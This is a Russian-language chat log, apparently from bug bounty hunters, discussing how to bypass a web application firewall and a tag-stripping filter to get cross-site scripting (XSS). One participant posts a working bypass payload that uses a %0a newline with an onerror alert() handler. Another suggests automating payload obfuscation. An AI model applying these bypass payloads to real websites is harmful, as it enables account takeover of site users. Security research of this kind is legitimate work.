᠌
Вообще впервые встречаю такой Waf, который не могу обойти))
Size: a a a
2020 October 03
А
Может ну нафиг хсс и пойти искать нормальные баги?
BF
Может ну нафиг хсс и пойти искать нормальные баги?
Зачем? Тогда вообще ни один ваф обойти не получится(
᠌
Да вроде норм бага, в некоторых случаях ведёт до account takeover
BF
У меня была такая идея: брать обфускатор кода и кучу раз прогонять один и тот же пейлоад через него
BF
С жаваскриптом особенно актуально, он-то люто полиморфные конструкции может рожать
BF
Ну чтобы не муторно было каждый раз постоянно что-то что ещё в голову придёт пробовать, просто автоматизировать весь трэш этот и вперёд
BF
А дальше только дедукция и анализ
᠌
Лол, я смог
᠌
Тут ещё такая штука была - рандомные теги удаляются типа
a<p>b -> ab. Почему я это не попробовал сразу? Тогда убирались вообще все теги, даже незаконченные, поэтомуawes<><acd><>awe"<image/src=x""+<p>onerror="alert() -> awesawe"onerror="alert()
Но, я нашёл байпасс - если поставить %0a где-то в пайлоаде, то незаконченные теги не будут убраны на предыдущей линииawes<><acd><>awe"<image/src=x"%0a"+<p>onerror="alert() -> awesawe"<image/src=x"{{%0a}}" onerror="alert()"</td>BF
stored, надеюсь?
᠌
Неа))
BF
Бля. Куки без хттпонли?
᠌
Ну вообще с xss можно что угодно сделать и без куков
BF
Хм...
VV
Тут ещё такая штука была - рандомные теги удаляются типа
a<p>b -> ab. Почему я это не попробовал сразу? Тогда убирались вообще все теги, даже незаконченные, поэтомуawes<><acd><>awe"<image/src=x""+<p>onerror="alert() -> awesawe"onerror="alert()
Но, я нашёл байпасс - если поставить %0a где-то в пайлоаде, то незаконченные теги не будут убраны на предыдущей линииawes<><acd><>awe"<image/src=x"%0a"+<p>onerror="alert() -> awesawe"<image/src=x"{{%0a}}" onerror="alert()"</td>Красиво, снимаю шляпу
᠌
Я тебя нашел в этой программе))
VV
Тогда я знаю, что это за программа 😊
VV
Надо же, что-то еще осталось у них
᠌
Ну я думаю еще дофига всего есть, раз они даже приостановили репорты